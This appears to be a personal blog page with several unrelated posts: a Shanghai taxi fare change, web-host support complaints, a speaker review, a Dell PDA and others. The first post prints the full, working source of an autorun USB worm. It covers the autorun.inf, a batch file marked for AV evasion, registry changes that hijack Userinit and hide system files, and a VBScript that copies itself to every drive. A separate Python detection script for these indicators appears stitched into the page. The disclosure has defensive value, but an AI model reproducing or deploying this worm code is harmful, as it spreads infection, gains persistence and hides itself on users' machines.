.: HitHat Blog :. Billy Qiu’s blog, Shanghai, P.R.China

Uncategorized


Recently all the laptops in our office got attacked by some "autorun" worm.

Here is the source of the worm's files. They can be found in the %systemroot%\system32\ folder and in the root of every infected drive.

1. Autorun.inf

[autorun]
shell\open=打开(&O)
shell\open\Command=WScript.exe .\autorun.vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exe .\autorun.vbs

2. Autorun.bat

@echo off
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit

';AV evasion
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
';AV evasion

:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="-" attrib -s -a -h -r %2\sxs.exe
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\sxs.exe
:end

3. Autorun.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,autorun.bat"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"autorun"="sxs.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
"Hidden"=dword:00000002

4. Autorun.vbs

on error resume next
Set WshShell =CreateObject("WScript.Shell")

if 1=0 then
else
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)

Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\autorun.vbs" then
isdir=true
else
a=WshShell.Run("autorun.bat Open" ,0,False)
isdir=false
end if
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("autorun.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\autorun.bat",d&"\",True
Of.CopyFile dir&"\sxs.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\autorun.reg",d&"\",True
Of.CopyFile dir&"\autorun.vbs",d&"\",True
else
Of.CopyFile "autorun.bat",d&"\",True
Of.CopyFile "sxs.exe",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
Of.CopyFile "autorun.reg",d&"\",True
Of.CopyFile "autorun.vbs",d&"\",True
end if
a=WshShell.Run("autorun.bat + "&d ,0,True)
End If
next
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("autorun.bat - "&dir ,0,True)
Of.CopyFile "autorun.bat",dir&"\",True
Of.CopyFile "sxs.exe",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "autorun.reg",dir&"\",True
Of.CopyFile "autorun.vbs",dir&"\",True
a=WshShell.Run("autorun.bat + "&dir ,0,True)
End if
next
End if
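As an added defender-side example (not code from the post or the worm), a small Python triage helper that parses the autorun.inf and autorun.reg formats shown above and flags the indicators this worm depends on: shell verbs whose command is a script host, a Default= override of the double-click action, a Userinit value that starts anything besides userinit.exe, Run/RunOnce droppers, and ShowSuperHidden=0. The two sample inputs are constructed copies of the listings above, and the SCRIPT_HOSTS list and the function names are my own choices.

```python
# Constructed copies of the worm's two text artifacts quoted above (sample input only).
AUTORUN_INF = r"""[autorun]
shell\open\Command=WScript.exe .\autorun.vbs
shell\open\Default=1
shell\explore\Command=WScript.exe .\autorun.vbs
"""
AUTORUN_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,autorun.bat"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"autorun"="sxs.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
"""
# Script hosts a legitimate autorun.inf has no business launching (my own list, not exhaustive).
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "cmd.exe", "rundll32.exe", "mshta.exe")

def parse_ini(text):
    """Parse INI / .reg text into {section: {key: value}}; keys lower-cased, quotes stripped."""
    data, section = {}, None
    for line in (ln.strip() for ln in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            data.setdefault(section, {})
        elif "=" in line and section is not None and not line.startswith(";"):
            key, _, value = line.partition("=")
            data[section][key.strip().strip('"').lower()] = value.strip().strip('"')
    return data

def autorun_findings(inf_text):
    """Flag shell verbs that launch a script host, and a Default= override of the double-click action."""
    findings = []
    for key, value in parse_ini(inf_text).get("autorun", {}).items():
        if key.endswith("\\command") and any(h in value.lower() for h in SCRIPT_HOSTS):
            findings.append(f"{key} launches a script host: {value}")
        elif key.endswith("\\default"):
            findings.append(f"{key} makes a custom verb the default action")
    return findings

def reg_findings(reg_text):
    """Flag the Userinit hijack, Run/RunOnce droppers and the Explorer setting that hides the files."""
    findings = []
    for section, values in parse_ini(reg_text).items():
        tail = section.rsplit("\\", 1)[-1].lower()
        if tail == "winlogon" and "userinit" in values:
            # A clean value is just userinit.exe (plus a trailing comma); anything after it is an add-on.
            extra = [p.strip() for p in values["userinit"].split(",") if p.strip() and not p.strip().lower().endswith("userinit.exe")]
            if extra:
                findings.append(f"Userinit also starts {extra}")
        elif tail in ("run", "runonce"):
            findings += [f"{tail} entry {k!r} starts {v}" for k, v in values.items()]
        elif tail == "advanced" and values.get("showsuperhidden") == "dword:00000000":
            findings.append("ShowSuperHidden=0 hides protected system files, such as the dropped autorun.*")
    return findings
```

Run the two functions over an autorun.inf and a .reg pulled from a suspect drive; a normal installer's autorun.inf (open=setup.exe, icon=...) produces no findings.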

OpenVPN is a free, open-source VPN solution. I installed the GUI version on my Windows 2003 server a long time ago. However, I tried hard to configure it at that time by following some web tutorial but couldn’t get it to work properly. Today I found two posts in Chinese which helped me finally get it to work.

Links below:

How to configure an OpenVPN server with CA authentication on Windows (by ELM)

OpenVPN Ethernet bridging (by 温占考 from OpenVPN.net)

Photo: Shanghai taxi (courtesy of "decade_null")

Shanghai taxi fares rise from May 11: the base fare, which covers the first three kilometers, increases from 10 yuan to 11 yuan during the day (before 11pm), and the fare after 11pm jumps from the current 13 yuan to 14 yuan.

Besides this, the price for each additional kilometer also rises slightly, from 2 yuan to 2.1 yuan.

Reported by Shanghai Daily

JamoWoo.com

Get Billy’s invitation to try WP here. It’s unbelievably powerful and versatile, much stronger than MT 2.6, which I currently use.

After several rollbacks to historical data and two days of total server outage, Wangjianshuo, a famous blogger in Shanghai, had been dealing with support cases with his hosting service provider lunarpages.com, which had a very, very poor support service. He said the support ticket he opened had no response for more than 56 hours. (Hard to imagine for me, as I am going to do business with this vendor.) Well, he finally found that the quickest way to contact them was via a telephone call. Although he was asked to stay on hold for 7 minutes, he said that was much better than his previous vendor, ipowerweb, which had told him to wait for 27 minutes.

Well, I also think that most of the call centers in the States do have very poor service. I hardly have the patience to wait about 20 minutes to talk to a real person. This happens so frequently that, interestingly, it is regarded as normal and widely accepted by most Americans.

Speaking of poor telephone support services, there are some exceptions, however, that I would like to mention here. One example is Citibank, which did a series of TV commercials advertising its new call center services, saying that its customers can talk directly to a real person when making a phone call for support. Since I’m not one of its card users, I’ve never tested it. The other example is GoDaddy (it seems I’ve been mentioning GoDaddy frequently recently; I promise I’m not advertising here). They actively make phone calls to their customers asking whether they have any questions about using their services when the customers have made a purchase recently. As for myself, I got at least three phone calls from them; however, due to the timezone difference, I didn’t pick up any of them, as they came in the middle of my night. They kept trying for 3 nights in a row. That was amazing to me. And some Americans even couldn’t help shouting out excitedly about that: “Wow, GoDaddy called me, which was cool!” (I heard similar expressions in both the TWiT and Diggnation podcasts.) hehe

In the Rodale office, an eye-catching yellow towel with “Terrible Towel” printed on it in big letters, hung on Devon’s cubicle, aroused my interest.

Photo: Terrible Towel

I searched the web for its story. It is a gimmick created by Myron Cope, a broadcaster for the Pittsburgh Steelers (an American football team). Needing a way to excite the fans during a 1975 playoff game against the Baltimore Colts, Cope urged fans to take yellow dish towels to the game and wave them throughout. The stands were filled with yellow towels that day, and the Steelers always seemed to complete terrific plays when the towels were waving. The Steelers won that game 28-10.

So Devon must be a super fan of the Pittsburgh Steelers.

Check out Answers.com for more info

Today I finally received the JBL Duet speakers shipped from Amazon. They look really cute; I like this special shape. They perfectly match the Apple iPod design. However, I haven’t owned an iPod for years now, since mine got burned while being unplugged from the USB port. You should also be very careful if you have an Apple product; they are very nice but can be fragile!
Anyway, what I want to say here is that the JBL Duet sound quality is amazing. Although it’s small, if not tiny, the sound is crystal clear. The signal-to-noise ratio is very high, I mean by real feeling. Bass is much better than many other powered speakers of that size, and vocals also sound clean and tend to feel “real”, I mean acoustic, not too “digital”, you know.
I tried playing some MP3s using a Creative MuVo; the guitar intro sounded pretty cool. It was like someone playing in my bedroom. Nice that I made up my mind to buy this one; it turned out to be another good bargain, haha!

Watched Lost yesterday from ABC

Since I came to the US, it was my first time watching the 2nd season of my favorite (and only) TV show, LOST, on ABC, Wed 9/8c.
It was because of two things. One, Lost stopped broadcasting in late November for six weeks. Actually, it resumed last week, 11 Jan. Well, unfortunately I missed it, because of the 2nd reason: we didn’t have a TV in our former apartment. I moved to this new apartment to share it with my colleague Pankaj. Nice that he finally got both a TV and working cable.
However, it was also very possible that I could have missed it, since the cable signal was dead from Tuesday afternoon but recovered like a miracle the next day in the evening. And I’m glad that I found the right channel for the show. We don’t have a dedicated ABC channel here; it was shown on channel #62, which is usually a very dull channel called RAI Internal.

Wow, I’m doing pocket blogging now

Installed the Pocket Blog program, which is free to download from the Pocket Blog website. It supports my MT-based blog system very well; I can even create entries offline and get them synced when I get online. A very practical function, even better than the MT admin console. :)
I also noticed another program called Pocket Sharp MT. I’ll try it as well and update this entry later.

Bought the DELL X51v from DELL.com for a total cost of $388 and have been using it for a week now. The VGA screen really rocks. However, the Windows Mobile 5 OS sucks, and Media Player tends to hang the whole system. Soft resets became a frequent thing to do to get things fixed.
